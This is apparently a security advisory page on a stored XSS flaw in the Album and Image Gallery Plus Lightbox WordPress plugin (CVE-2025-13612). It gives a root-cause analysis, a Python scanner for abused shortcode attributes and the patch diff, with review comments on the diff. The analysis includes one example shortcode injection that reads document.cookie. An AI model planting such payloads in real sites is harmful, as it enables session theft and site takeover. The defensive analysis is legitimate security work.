Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-13612: Album and Image Gallery Plus Lightbox <= 2.1.7 – Authenticated (Contributor+) Stored Cross-Site Scripting via Plugin's Shortcode (album-and-image-gallery-plus-lightbox)

Severity: Medium (CVSS 6.4)
CWE: 79
Vulnerable Version: 2.1.7
Patched Version: 2.1.8
Disclosed: February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13612:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Album and Image Gallery plus Lightbox WordPress plugin. The vulnerability affects the plugin’s `aigpl-gallery-album` shortcode handler in versions up to and including 2.1.7. Attackers with contributor-level access or higher can inject malicious scripts via shortcode attributes, which execute when users view pages containing the manipulated shortcode.

The root cause is insufficient input sanitization and output escaping of user-supplied shortcode attributes. The vulnerable code resides in `/includes/shortcode/aigpl-gallery-album.php` within the `aigpl_gallery_album_shortcode()` function. Specifically, the `content_tail` parameter (line 81 in the diff) is processed using `html_entity_decode()` without subsequent sanitization before being output in the rendered HTML. This allows attackers to inject JavaScript payloads that persist in the database and execute when the page loads.

Exploitation requires an authenticated attacker with at least contributor privileges to create or edit posts containing the `[aigpl-gallery-album]` shortcode. The attacker would craft a malicious shortcode with a `content_tail` parameter containing JavaScript, such as `[aigpl-gallery-album content_tail="…alert(document.cookie)"]`. When this post is saved and later viewed by any user, the script executes in the victim's browser context.

The patch in version 2.1.8 addresses the vulnerability by applying proper sanitization to the `content_tail` parameter. The diff shows line 81 changed from `$content_tail = html_entity_decode( $content_tail );` to `$content_tail = sanitize_text_field( $content_tail );`. This replacement ensures that any HTML or script content in the parameter is converted to plain text before being included in the output. The patch also adds sanitization to other user inputs throughout the codebase, including `$album_ses` parameter handling and various admin functions.

Successful exploitation allows attackers to perform actions within the victim’s WordPress session, including stealing authentication cookies, performing administrative actions, redirecting users to malicious sites, or defacing websites. Since the XSS is stored, a single injection affects all users who view the compromised page, potentially leading to widespread account compromise and site takeover.
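As an added example (not part of the Atomic Edge analysis and not the plugin's own code), the following Python script shows how a site owner could hunt existing post content for album shortcodes whose attributes carry entity-encoded or raw markup, which is the class of stored input that `html_entity_decode()` turned back into live HTML before the 2.1.8 change. Python's `html.unescape()` stands in for PHP's `html_entity_decode()`; the shortcode and attribute grammar is a simplified version of WordPress's `shortcode_parse_atts()` (attribute values containing `]` are not handled); the post rows and shortcode names beyond `aigpl-gallery-album` and `aigpl-gallery-album-slider` are constructed for the example. It flags any tag after decoding, benign or not, so hits are a triage list, not a verdict.

```python
import html
import re

# Shortcodes handled by the plugin's album shortcode files (names taken from the diff).
SHORTCODE_RE = re.compile(r"\[(aigpl-gallery-album(?:-slider)?)\b([^\]]*)\]")

# Simplified attribute grammar: key="v", key='v' or key=v. This is a cut-down stand-in
# for WordPress's shortcode_parse_atts(); values containing ']' are not handled.
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'\]]+))""")

# Any decoded value that opens a tag is what html_entity_decode() would have handed
# straight to the rendered page; sanitize_text_field() strips such tags instead.
TAG_RE = re.compile(r"<\s*/?[a-zA-Z]")


def parse_atts(raw: str) -> dict:
    """Parse 'key="value" key2=value' into a dict (simplified WordPress semantics)."""
    atts = {}
    for m in ATTR_RE.finditer(raw):
        key = m.group(1)
        # Exactly one of the three value alternatives matched.
        value = next(v for v in m.groups()[1:] if v is not None)
        atts[key] = value
    return atts


def scan_post(post_id, content: str) -> list:
    """Return one finding per shortcode attribute that decodes to HTML markup."""
    findings = []
    for m in SHORTCODE_RE.finditer(content):
        name, raw_atts = m.group(1), m.group(2)
        for key, value in parse_atts(raw_atts).items():
            decoded = html.unescape(value)  # Python analogue of html_entity_decode()
            if TAG_RE.search(decoded):
                findings.append({
                    "post_id": post_id,
                    "shortcode": name,
                    "attr": key,
                    "stored": value,
                    "decoded": decoded,
                })
    return findings


def scan_posts(posts) -> list:
    """Scan (post_id, post_content) rows, e.g. exported from wp_posts."""
    findings = []
    for post_id, content in posts:
        findings.extend(scan_post(post_id, content))
    return findings


# Constructed sample rows standing in for wp_posts.post_content.
SAMPLE_POSTS = [
    (101, 'Intro text [aigpl-gallery-album limit="6" content_tail="..."] more text'),
    (102, '[aigpl-gallery-album content_tail="&lt;b&gt;read more&lt;/b&gt;" grid=3]'),
    (103, "[aigpl-gallery-album-slider content_tail='<i>more</i>' album_dots=\"true\"]"),
    (104, "No shortcode here, just prose."),
]

if __name__ == "__main__":
    for f in scan_posts(SAMPLE_POSTS):
        print(f"post {f['post_id']}: [{f['shortcode']}] attribute {f['attr']!r} "
              f"stored as {f['stored']!r}, decodes to {f['decoded']!r}")
```

Post 101 is clean, post 102 carries an entity-encoded tag that only becomes markup after decoding, and post 103 carries a raw tag; both of the latter are reported. Feeding the script a real export of `post_content` is a quick way to check whether the decode path was ever abused before the plugin was updated.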

Differential between vulnerable and patched code

Code Diff
--- a/album-and-image-gallery-plus-lightbox/album-and-image-gallery.php
+++ b/album-and-image-gallery-plus-lightbox/album-and-image-gallery.php
@@ -1,13 +1,15 @@
 <?php
 /**
  * Plugin Name: Album and Image Gallery Plus Lightbox
- * Plugin URI: https://www.essentialplugin.com/wordpress-plugins/album-image-gallery-plus-lightbox
+ * Plugin URI: https://essentialplugin.com/wordpress-plugins/album-image-gallery-plus-lightbox
  * Description: Easy to add and display image gallery and gallery slider. Also work with Gutenberg shortcode block.
  * Author: Essential Plugin
  * Text Domain: album-and-image-gallery-plus-lightbox
  * Domain Path: /languages/
- * Version: 2.1.7
- * Author URI: https://www.essentialplugin.com
+ * Version: 2.1.8
+ * Author URI: https://essentialplugin.com
+ * License: GPLv2 or later
+ * License URI: http://www.gnu.org/licenses/gpl-2.0.html
  *
  * @package Album and Image Gallery Plus Lightbox
  * @author Essential Plugin
@@ -23,43 +25,43 @@
  * @since 1.0.0
  */
 if ( ! defined( 'AIGPL_VERSION' ) ) {
-	define( 'AIGPL_VERSION', '2.1.7' ); // Version of plugin
+	define( 'AIGPL_VERSION', '2.1.8' ); // Version of plugin
 }

-if( ! defined( 'AIGPL_DIR' ) ) {
+if ( ! defined( 'AIGPL_DIR' ) ) {
 	define( 'AIGPL_DIR', dirname( __FILE__ ) ); // Plugin dir
 }

-if( ! defined( 'AIGPL_URL' ) ) {
+if ( ! defined( 'AIGPL_URL' ) ) {
 	define( 'AIGPL_URL', plugin_dir_url( __FILE__ ) ); // Plugin url
 }

-if( ! defined( 'AIGPL_POST_TYPE' ) ) {
+if ( ! defined( 'AIGPL_POST_TYPE' ) ) {
 	define( 'AIGPL_POST_TYPE', 'aigpl_gallery' ); // Plugin post type
 }

-if( ! defined( 'AIGPL_CAT' ) ) {
+if ( ! defined( 'AIGPL_CAT' ) ) {
 	define( 'AIGPL_CAT', 'aigpl_cat' ); // Plugin category name
 }

-if( ! defined( 'AIGPL_META_PREFIX' ) ) {
+if ( ! defined( 'AIGPL_META_PREFIX' ) ) {
 	define( 'AIGPL_META_PREFIX', '_aigpl_' ); // Plugin metabox prefix
 }

-if( ! defined( 'AIGPL_PLUGIN_LINK_UPGRADE' ) ) {
-	define('AIGPL_PLUGIN_LINK_UPGRADE','https://www.essentialplugin.com/pricing/?utm_source=WP&utm_medium=Album-Gallery&utm_campaign=Upgrade-PRO'); // Plugin Check link
+if ( ! defined( 'AIGPL_PLUGIN_LINK_UPGRADE' ) ) {
+	define('AIGPL_PLUGIN_LINK_UPGRADE','https://essentialplugin.com/pricing/?utm_source=WP&utm_medium=Album-Gallery&utm_campaign=Upgrade-PRO'); // Plugin Check link
 }

-if( ! defined( 'AIGPL_SITE_LINK' ) ) {
-	define('AIGPL_SITE_LINK', 'https://www.essentialplugin.com'); // Plugin Site link
+if ( ! defined( 'AIGPL_SITE_LINK' ) ) {
+	define('AIGPL_SITE_LINK', 'https://essentialplugin.com'); // Plugin Site link
 }

-if( ! defined( 'AIGPL_PLUGIN_BUNDLE_LINK' ) ) {
-	define('AIGPL_PLUGIN_BUNDLE_LINK', 'https://www.essentialplugin.com/pricing/?utm_source=WP&utm_medium=Album-Gallery&utm_campaign=Welcome-Screen'); // Plugin link
+if ( ! defined( 'AIGPL_PLUGIN_BUNDLE_LINK' ) ) {
+	define('AIGPL_PLUGIN_BUNDLE_LINK', 'https://essentialplugin.com/pricing/?utm_source=WP&utm_medium=Album-Gallery&utm_campaign=Welcome-Screen'); // Plugin link
 }

-if( ! defined( 'AIGPL_PLUGIN_LINK_UNLOCK' ) ) {
-	define('AIGPL_PLUGIN_LINK_UNLOCK', 'https://www.essentialplugin.com/pricing/?utm_source=WP&utm_medium=Album-Gallery&utm_campaign=Features-PRO'); // Plugin link
+if ( ! defined( 'AIGPL_PLUGIN_LINK_UNLOCK' ) ) {
+	define('AIGPL_PLUGIN_LINK_UNLOCK', 'https://essentialplugin.com/pricing/?utm_source=WP&utm_medium=Album-Gallery&utm_campaign=Features-PRO'); // Plugin link
 }

 /**
@@ -131,7 +133,7 @@
 	aigpl_register_taxonomies();

 	// Deactivate Pro version
-	if( is_plugin_active('album-and-image-gallery-plus-lightbox-pro/album-and-image-gallery.php') ){
+	if ( is_plugin_active('album-and-image-gallery-plus-lightbox-pro/album-and-image-gallery.php') ){
 		add_action('update_option_active_plugins', 'aigpl_deactivate_pro_version');
 	}

@@ -158,13 +160,13 @@
 	global $pagenow;

 	// If not plugin screen
-	if( 'plugins.php' != $pagenow ) {
+	if ( 'plugins.php' != $pagenow ) {
 		return;
 	}

 	$dir = WP_PLUGIN_DIR . '/album-and-image-gallery-plus-lightbox-pro/album-and-image-gallery.php';

-	if( ! file_exists( $dir ) ) {
+	if ( ! file_exists( $dir ) ) {
 		return;
 	}

@@ -172,13 +174,16 @@
 	$notice_transient	= get_transient( 'aigpl_install_notice' );

 	// If free plugin exist
-	if( $notice_transient == false && current_user_can( 'install_plugins' ) ) {
+	if ( $notice_transient == false && current_user_can( 'install_plugins' ) ) {
 		echo '<div class="updated notice" style="position:relative;">
 			<p>
-				<strong>'.sprintf( __('Thank you for activating %s', 'album-and-image-gallery-plus-lightbox'), 'Album and Image Gallery Plus Lightbox').'</strong>.<br/>
-				'.sprintf( __('It looks like you had PRO version %s of this plugin activated. To avoid conflicts the extra version has been deactivated and we recommend you delete it.', 'album-and-image-gallery-plus-lightbox'), '<strong>Album and Image Gallery Plus Lightbox PRO</strong>' ).'
-			</p>
-			<a href="'.esc_url( $notice_link ).'" class="notice-dismiss" style="text-decoration:none;"></a>
+				<strong>' .
+				/* translators: %s is the plugin name that was activated */
+				sprintf( __('Thank you for activating %s', 'album-and-image-gallery-plus-lightbox'), 'Album and Image Gallery Plus Lightbox') . '</strong>.<br/>' .
+				/* translators: %s is the PRO plugin name that should be deactivated */
+				sprintf( __('It looks like you had PRO version %s of this plugin activated. To avoid conflicts the extra version has been deactivated and we recommend you delete it.', 'album-and-image-gallery-plus-lightbox'), '<strong>Album and Image Gallery Plus Lightbox PRO</strong>' ) .
+			'</p>
+			<a href="' . esc_url( $notice_link ) . '" class="notice-dismiss" style="text-decoration:none;"></a>
 		</div>';
 	}
 }
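Review bot: the rebuilt notice still echoes the results of `sprintf( __('Thank you for activating %s', ...) )` and `sprintf( __('It looks like you had PRO version %s ...') )` straight into HTML with no escaping; translation strings come from loaded language files, so wrap each result in `wp_kses( ..., array( 'strong' => array() ) )`, or use `esc_html__()` for the first one, which contains no markup of its own. The `esc_url( $notice_link )` on the dismiss link is correct, and the added `/* translators: */` comments are good.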
@@ -228,13 +233,13 @@

 	wpos_espbw_init_module( array(
 							'prefix'	=> 'aigpl',
-							'menu'		=> 'edit.php?post_type='.AIGPL_POST_TYPE,
+							'menu'		=> 'edit.php?post_type=' . AIGPL_POST_TYPE,
 						));
 }
 /* Recommended Plugins Ends */

 /* Plugin Wpos Analytics Data Starts */
-if( ! function_exists( 'aigpl_analytics_load' ) ) {
+if ( ! function_exists( 'aigpl_analytics_load' ) ) {
 	function aigpl_analytics_load() {

 		require_once dirname( __FILE__ ) . '/wpos-analytics/wpos-analytics.php';
--- a/album-and-image-gallery-plus-lightbox/includes/admin/class-aigpl-admin.php
+++ b/album-and-image-gallery-plus-lightbox/includes/admin/class-aigpl-admin.php
@@ -159,7 +159,7 @@
 	 */
 	function aigpl_add_post_row_data( $actions, $post ) {

-		if( $post->post_type == AIGPL_POST_TYPE ) {
+		if ( $post->post_type == AIGPL_POST_TYPE ) {
 			return array_merge( array( 'aigpl_id' => 'ID: ' . esc_attr( $post->ID )), $actions );
 		}

@@ -175,7 +175,7 @@

 		global $typenow;

-		if( $typenow == AIGPL_POST_TYPE ) {
+		if ( $typenow == AIGPL_POST_TYPE ) {
 			include_once( AIGPL_DIR .'/includes/admin/settings/aigpl-img-popup.php');
 		}
 	}
@@ -194,11 +194,11 @@
 		$attachment_id		= ! empty( $_POST['attachment_id'] )	? aigpl_clean( $_POST['attachment_id'] )	: '';
 		$nonce				= ! empty( $_POST['nonce'] )			? aigpl_clean( $_POST['nonce'] )			: '';

-		if( ! empty( $attachment_id ) && wp_verify_nonce( $nonce, 'aigpl-edit-attachment-data' ) ) {
+		if ( ! empty( $attachment_id ) && wp_verify_nonce( $nonce, 'aigpl-edit-attachment-data' ) ) {

 			$attachment_post = get_post( $attachment_id );

-			if( ! empty( $attachment_post ) ) {
+			if ( ! empty( $attachment_post ) ) {

 				ob_start();

@@ -224,20 +224,27 @@
 	function aigpl_save_attachment_data() {

 		$prefix				= AIGPL_META_PREFIX;
-		$result				= array();
-		$result['success']	= 0;
-		$result['msg']		= esc_js( __( 'Sorry, Something happened wrong.', 'album-and-image-gallery-plus-lightbox' ) );
+		$result = array(
+			'success' => 0,
+			'msg'     => esc_js( __( 'Sorry, something went wrong.', 'album-and-image-gallery-plus-lightbox' ) ),
+		);
+
+		// Check if required POST values exist and sanitize
 		$attachment_id		= ! empty( $_POST['attachment_id'] )	? aigpl_clean( $_POST['attachment_id'] )	: '';
 		$nonce				= ! empty( $_POST['nonce'] )			? aigpl_clean( $_POST['nonce'] )			: '';
-		$form_data			= parse_str( $_POST['form_data'], $form_data_arr );
+		$form_data_arr = array(); // initialize to avoid undefined variable
+		if ( isset( $_POST['form_data'] ) ) {
+			$raw_form_data = wp_unslash( $_POST['form_data'] ); // store unslashed input in a variable
+			parse_str( $raw_form_data, $form_data_arr );          // parse into array
+		}

-		if( ! empty( $attachment_id ) && ! empty( $form_data_arr ) && wp_verify_nonce( $nonce, "aigpl-save-attachment-data-{$attachment_id}" ) ) {
+		if ( ! empty( $attachment_id ) && ! empty( $form_data_arr ) && wp_verify_nonce( $nonce, "aigpl-save-attachment-data-{$attachment_id}" ) ) {

 			// Getting attachment post
 			$aigpl_attachment_post = get_post( $attachment_id );

 			// If post type is attachment
-			if( isset( $aigpl_attachment_post->post_type ) && $aigpl_attachment_post->post_type == 'attachment' ) {
+			if ( isset( $aigpl_attachment_post->post_type ) && $aigpl_attachment_post->post_type == 'attachment' ) {
 				$post_args = array(
 									'ID'			=> $attachment_id,
 									'post_title'	=> ! empty( $form_data_arr['aigpl_attachment_title'] ) ? $form_data_arr['aigpl_attachment_title'] : $aigpl_attachment_post->post_name,
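Review bot: no capability check appears anywhere in this hunk: the `wp_verify_nonce()` call proves the request came from the plugin's own form, not that the caller is allowed to edit this attachment, so unless a `current_user_can()` check lives outside the visible lines, add `current_user_can( 'edit_post', $attachment_id )` to the condition before `get_post( $attachment_id )`. Two smaller points: the new `isset( $_POST['form_data'] )` guard with `wp_unslash()` is right, but `$attachment_id` and `$nonce` two lines above still go through `aigpl_clean()` without `wp_unslash()`, so unslashing is inconsistent within one handler; and `$form_data_arr['aigpl_attachment_title']` is written into `post_title` with no sanitization of its own, relying on whatever `wp_update_post()` applies, so a `sanitize_text_field()` here would make the intent explicit.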
@@ -246,7 +253,7 @@
 								);
 				$update = wp_update_post( $post_args );

-				if( ! is_wp_error( $update ) ) {
+				if ( ! is_wp_error( $update ) ) {

 					update_post_meta( $attachment_id, '_wp_attachment_image_alt', aigpl_clean( $form_data_arr['aigpl_attachment_alt'] ) );
 					update_post_meta( $attachment_id, $prefix.'attachment_link', aigpl_clean_url( $form_data_arr['aigpl_attachment_link'] ) );
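Review bot: `$form_data_arr['aigpl_attachment_alt']` and `$form_data_arr['aigpl_attachment_link']` are read without an `isset()` guard (the `post_title` line in the previous hunk does use `! empty()`), so a form post lacking either key raises an undefined-index notice; read them as `$form_data_arr['aigpl_attachment_alt'] ?? ''` and `$form_data_arr['aigpl_attachment_link'] ?? ''` before passing them to `aigpl_clean()` / `aigpl_clean_url()`.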
@@ -269,22 +276,32 @@

 		global $typenow;

-		$current_page = isset( $_REQUEST['page'] ) ? $_REQUEST['page'] : '';
+		// Unsplash and sanitize input
+		$current_page = isset( $_REQUEST['page'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['page'] ) ) : '';

 		// If plugin notice is dismissed
-		if( isset( $_GET['message']) && $_GET['message'] == 'aigpl-plugin-notice' ) {
+		if ( isset( $_GET['message']) && $_GET['message'] == 'aigpl-plugin-notice' ) {
 			set_transient( 'aigpl_install_notice', true, 604800 );
 		}

 		// Redirect to external page for upgrade to menu
-		if( $typenow == AIGPL_POST_TYPE ) {
+		if ( $typenow == AIGPL_POST_TYPE ) {

-			if( $current_page == 'aigpl-premium' ) {
+			if ( $current_page == 'aigpl-premium' ) {

-				$tab_url		= add_query_arg( array( 'post_type' => AIGPL_POST_TYPE, 'page' => 'aigpl-solutions-features', 'tab' => 'aigpl_basic_tabs' ), admin_url('edit.php') );
+				$tab_url = add_query_arg(
+					array(
+						'post_type' => AIGPL_POST_TYPE,
+						'page'      => 'aigpl-solutions-features',
+						'tab'       => 'aigpl_basic_tabs'
+					),
+					admin_url('edit.php')
+				);

-				wp_redirect( $tab_url );
+				// Use wp_safe_redirect for safer redirection
+				wp_safe_redirect( $tab_url );
 				exit;
+
 			}
 		}

--- a/album-and-image-gallery-plus-lightbox/includes/admin/metabox/aigpl-post-setting-metabox-pro.php
+++ b/album-and-image-gallery-plus-lightbox/includes/admin/metabox/aigpl-post-setting-metabox-pro.php
@@ -10,19 +10,13 @@
 	exit; // Exit if accessed directly
 } ?>

-<!-- <div class="pro-notice"><strong><?php //echo sprintf( __( 'Utilize this <a href="%s" target="_blank">Premium Features (With Risk-Free 30 days money back guarantee)</a> to get best of this plugin with Annual or Lifetime bundle deal.', 'album-and-image-gallery-plus-lightbox'), AIGPL_PLUGIN_LINK_UNLOCK); ?></strong></div> -->
-
-<!-- <div class="pro-notice">
-	<strong>
-		<?php // echo sprintf( __( 'Try All These <a href="%s" target="_blank">PRO Features in Essential Bundle Free For 5 Days.</a>', 'album-and-image-gallery-plus-lightbox'), AIGPL_PLUGIN_LINK_UNLOCK); ?>
-	</strong>
-</div> -->
-
-<!-- <div class="aigpl-black-friday-banner-wrp">
-	<a href="<?php // echo esc_url( AIGPL_PLUGIN_LINK_UNLOCK ); ?>" target="_blank"><img style="width: 100%;" src="<?php // echo esc_url( AIGPL_URL ); ?>assets/images/black-friday-banner.png" alt="black-friday-banner" /></a>
-</div> -->
-
-<strong style="color:#2ECC71; font-weight: 700;"><?php echo sprintf( __( ' <a href="%s" target="_blank" style="color:#2ECC71;">Upgrade To Pro</a> and Get Designs, Optimization, Security, Backup, Migration Solutions @ one stop.', 'album-and-image-gallery-plus-lightbox'), AIGPL_PLUGIN_LINK_UNLOCK); ?></strong>
+<strong style="color:#2ECC71; font-weight: 700;">
+	<?php
+	/* translators: %s is the plugin upgrade url */
+	echo sprintf( __( ' <a href="%s" target="_blank" style="color:#2ECC71;">Upgrade To Pro</a> and Get Designs, Optimization, Security, Backup, Migration Solutions @ one stop.', 'album-and-image-gallery-plus-lightbox'),
+	AIGPL_PLUGIN_LINK_UNLOCK);
+	?>
+</strong>

 <table class="form-table aigpl-metabox-table">
 	<tbody>
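Review bot: `echo sprintf( __( ' <a href="%s" target="_blank" ...>Upgrade To Pro</a> ...' ), AIGPL_PLUGIN_LINK_UNLOCK );` still prints a translatable string containing an anchor tag with no escaping, and the constant is interpolated into `href` without `esc_url()`. Prefer `echo wp_kses( sprintf( __( ... ), esc_url( AIGPL_PLUGIN_LINK_UNLOCK ) ), array( 'a' => array( 'href' => array(), 'target' => array(), 'style' => array() ) ) );` so a swapped translation file cannot inject markup. The added `/* translators: */` comment and the removal of the commented-out banner blocks are fine.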
--- a/album-and-image-gallery-plus-lightbox/includes/admin/settings/solution-features/popup-ess-bundle-tab.php
+++ b/album-and-image-gallery-plus-lightbox/includes/admin/settings/solution-features/popup-ess-bundle-tab.php
@@ -14,10 +14,6 @@

 <div id="aigpl_unlock_tabs" class="aigpl-vtab-cnt aigpl_unlock_tabs aigpl-clearfix">

-	<!-- <div class="aigpl-black-friday-banner-wrp">
-		<a href="<?php // echo esc_url( AIGPL_PLUGIN_BUNDLE_LINK ); ?>" target="_blank"><img style="width: 100%;" src="<?php // echo esc_url( AIGPL_URL ); ?>assets/images/black-friday-banner.png" alt="black-friday-banner" /></a>
-	</div> -->
-
 	<h2 style="font-size: 24px; text-align: center; color: #6c63ff;">Bundle Deal Details</h2>
 	<table class="wpos-plugin-list">
 		<thead>
@@ -100,33 +96,4 @@
 		<img style="width: 100%; margin-bottom:30px;" src="<?php echo esc_url( AIGPL_URL ); ?>assets/images/image-upgrade.png" alt="image-upgrade" title="image-upgrade" />
 	</div>

-	<!-- <div class="aigpl-deal-offer-wrap">
-		<div class="aigpl-deal-offer">
-			<div class="aigpl-inn-deal-offer">
-				<h3 class="aigpl-inn-deal-hedding"><span>Buy Album and Image Gallery Plus Lightbox</span> today and unlock all the powerful features.</h3>
-				<h4 class="aigpl-inn-deal-sub-hedding"><span style="color:red;">Extra Bonus: </span>Users will get <span>15% off</span> on the regular price using this coupon code.</h4>
-			</div>
-			<div class="aigpl-inn-deal-offer-btn">
-				<div class="aigpl-inn-deal-code"><span>EPS15</span></div>
-				<a href="<?php //echo esc_url(AIGPL_PLUGIN_BUNDLE_LINK); ?>" target="_blank" class="aigpl-sf-btn aigpl-sf-btn-orange"><span class="dashicons dashicons-cart"></span> Get Essential Bundle Now</a>
-				<em class="risk-free-guarantee"><span class="heading">Risk-Free Guarantee </span> - We offer a <span>30-day money back guarantee on all purchases</span>. If you are not happy with your purchases, we will refund your purchase. No questions asked!</em>
-			</div>
-		</div>
-	</div> -->
-
-	<!-- <div class="aigpl-deal-offer-wrap">
-		<div class="aigpl-deal-offer">
-			<div class="aigpl-inn-deal-offer">
-				<h3 class="aigpl-inn-deal-hedding"><span>Try Album and Image Gallery Plus Lightbox Pro</span> in Essential Bundle Free For 5 Days.</h3>
-			</div>
-			<div class="aigpl-deal-free-offer">
-				<a href="<?php //echo esc_url( AIGPL_PLUGIN_BUNDLE_LINK ); ?>" target="_blank" class="aigpl-sf-free-btn"><span class="dashicons dashicons-cart"></span> Try Pro For 5 Days Free</a>
-			</div>
-		</div>
-	</div> -->
-
-	<!-- <div class="aigpl-black-friday-banner-wrp">
-		<a href="<?php// echo esc_url( AIGPL_PLUGIN_BUNDLE_LINK ); ?>" target="_blank"><img style="width: 100%;" src="<?php // echo esc_url( AIGPL_URL ); ?>assets/images/black-friday-banner.png" alt="black-friday-banner" /></a>
-	</div> -->
-
 </div>
 No newline at end of file
--- a/album-and-image-gallery-plus-lightbox/includes/admin/settings/solution-features/solutions-features.php
+++ b/album-and-image-gallery-plus-lightbox/includes/admin/settings/solution-features/solutions-features.php
@@ -13,7 +13,11 @@
 // Taking some variables
 $aigpl_add_link = add_query_arg( array( 'post_type' => AIGPL_POST_TYPE ), admin_url( 'post-new.php' ) );

-$tab = isset( $_GET['tab'] ) ? '#'.$_GET['tab'] : '#aigpl_welcome_tabs';
+$tab = '#aigpl_welcome_tabs';
+
+if ( isset( $_GET['tab'] ) ) {
+	$tab = '#' . sanitize_text_field( $_GET['tab'] );
+}
 ?>

 <div id="wrap" class="wpos-solutions-features-page">
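Review bot: `$tab = '#' . sanitize_text_field( $_GET['tab'] );` sanitizes but does not `wp_unslash()` first, unlike the `$_REQUEST['page']` change in class-aigpl-admin.php; apply `wp_unslash()` for consistency. More importantly, `sanitize_text_field()` does not make a value safe for every sink: `$tab` is a fragment that presumably lands in HTML or JavaScript further down this template, so escape it at the point of output (`esc_attr()` or `esc_js()`) rather than relying on input sanitization alone. Since the valid tabs are a fixed set (`aigpl_welcome_tabs`, `aigpl_basic_tabs` and `aigpl_unlock_tabs` all appear elsewhere in this diff), an allow-list check that falls back to `#aigpl_welcome_tabs` would be tighter still.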
@@ -35,13 +39,6 @@
 		.aigpl-vtab-nav.aigpl-active-vtab a{ box-shadow: 5px 0 0 0 #46b450 inset !important; }
 		.aigpl-vtab-nav-wrap .aigpl-vtab-nav a:hover {box-shadow: 5px 0 0 0 #6c63ff inset !important; }

-		/**** commod deal offer ****/
-		/*.aigpl-deal-offer-wrap{position: relative;padding: 0.75rem 1.25rem;margin-bottom: 1rem;border: 1px solid transparent;border-radius: 0.25rem; color: #000;background-color: #ffd104;border-color: #ffd104;margin-top: 20px;}
-
-		.aigpl-deal-offer{display:flex;align-items: center; margin-top: 15px;}
-		.aigpl-inn-deal-offer{flex-basis:60%; padding: 20px; text-align:left;}
-		.aigpl-inn-deal-hedding span{color:#6c63ff;}*/
-
 		/***free 5 day offer new CSS START***/
 		.aigpl-deal-offer-wrap{position: relative;padding:0 1.25rem;margin-bottom: 1rem;border: 1px solid transparent;border-radius: 0.25rem; color: #000;background-color: #6c63ff;border-color: #6c63ff;margin-top: 20px;}
 		.aigpl-deal-offer{display:flex;align-items: center;}
@@ -53,7 +50,6 @@
 		.aigpl-sf-free-btn:hover, .aigpl-sf-free-btn:focus{ color: #000; }
 		/***free 5 day offer new CSS END***/

-
 		.aigpl-inn-deal-hedding{font-size: 22px;}

 		.aigpl-inn-deal-sub-hedding{font-size: 18px;}
@@ -136,7 +132,6 @@
 			</li>

 			<li class="aigpl-vtab-nav">
-				<!-- <a href="#aigpl_unlock_tabs" class="aigpl-overview-tabs"><?php //esc_html_e('Unlock More', 'album-and-image-gallery-plus-lightbox'); ?></a> -->
 				<a href="#aigpl_unlock_tabs" class="aigpl-overview-tabs"><?php esc_html_e('Album in Essential Bundle', 'album-and-image-gallery-plus-lightbox'); ?></a>
 			</li>

--- a/album-and-image-gallery-plus-lightbox/includes/aigpl-functions.php
+++ b/album-and-image-gallery-plus-lightbox/includes/aigpl-functions.php
@@ -92,7 +92,7 @@
 	// For Elementor & Beaver Builder
 	if( ( defined('ELEMENTOR_PLUGIN_BASE') && isset( $_POST['action'] ) && $_POST['action'] == 'elementor_ajax' )
 	|| ( class_exists('FLBuilderModel') && ! empty( $_POST['fl_builder_data']['action'] ) ) ) {
-		$unique = current_time('timestamp') . '-' . rand();
+		$unique = current_time('timestamp') . '-' . wp_rand();
 	}

 	return $unique;
@@ -110,7 +110,7 @@
 	// For Elementor & Beaver Builder
 	if( ( defined('ELEMENTOR_PLUGIN_BASE') && isset( $_POST['action'] ) && $_POST['action'] == 'elementor_ajax' )
 	|| ( class_exists('FLBuilderModel') && ! empty( $_POST['fl_builder_data']['action'] ) ) ) {
-		$unique = current_time('timestamp') . '-' . rand();
+		$unique = current_time('timestamp') . '-' . wp_rand();
 	}

 	return $unique;
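Review bot: the `rand()` to `wp_rand()` swap here is identical to the one in the hunk above, and the whole Elementor/Beaver Builder branch (`defined('ELEMENTOR_PLUGIN_BASE') && isset( $_POST['action'] ) ...`) is duplicated verbatim between the two functions; pull it into one helper so future fixes land in one place. The `$_POST['action'] == 'elementor_ajax'` comparison on the context lines reads raw `$_POST` without `wp_unslash()` / `sanitize_key()`; harmless for an equality test, but inconsistent with the sanitized reads introduced elsewhere in this diff.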
--- a/album-and-image-gallery-plus-lightbox/includes/aigpl-post-types.php
+++ b/album-and-image-gallery-plus-lightbox/includes/aigpl-post-types.php
@@ -34,14 +34,14 @@
 								'remove_featured_image'		=> __( 'Remove Album Image', 'album-and-image-gallery-plus-lightbox' ),
 								'menu_name'					=> __( 'Album Gallery', 'album-and-image-gallery-plus-lightbox' ),
 								'use_featured_image'		=> __( 'Use as Album Image', 'album-and-image-gallery-plus-lightbox' ),
-								'items_list'				=> __( 'Album list.', 'sp-news-and-widget' ),
-								'item_published'			=> __( 'Album published.', 'sp-news-and-widget' ),
-								'item_published_privately'	=> __( 'Album published privately.', 'sp-news-and-widget' ),
-								'item_reverted_to_draft'	=> __( 'Album reverted to draft.', 'sp-news-and-widget' ),
-								'item_scheduled'			=> __( 'Album scheduled.', 'sp-news-and-widget' ),
-								'item_updated'				=> __( 'Album updated.', 'sp-news-and-widget' ),
-								'item_link'					=> __( 'Album Link', 'sp-news-and-widget' ),
-								'item_link_description'		=> __( 'A link to a album.', 'sp-news-and-widget' ),
+								'items_list'				=> __( 'Album list.', 'album-and-image-gallery-plus-lightbox' ),
+								'item_published'			=> __( 'Album published.', 'album-and-image-gallery-plus-lightbox' ),
+								'item_published_privately'	=> __( 'Album published privately.', 'album-and-image-gallery-plus-lightbox' ),
+								'item_reverted_to_draft'	=> __( 'Album reverted to draft.', 'album-and-image-gallery-plus-lightbox' ),
+								'item_scheduled'			=> __( 'Album scheduled.', 'album-and-image-gallery-plus-lightbox' ),
+								'item_updated'				=> __( 'Album updated.', 'album-and-image-gallery-plus-lightbox' ),
+								'item_link'					=> __( 'Album Link', 'album-and-image-gallery-plus-lightbox' ),
+								'item_link_description'		=> __( 'A link to a album.', 'album-and-image-gallery-plus-lightbox' ),
 							));

 	$aigpl_slider_args = array(
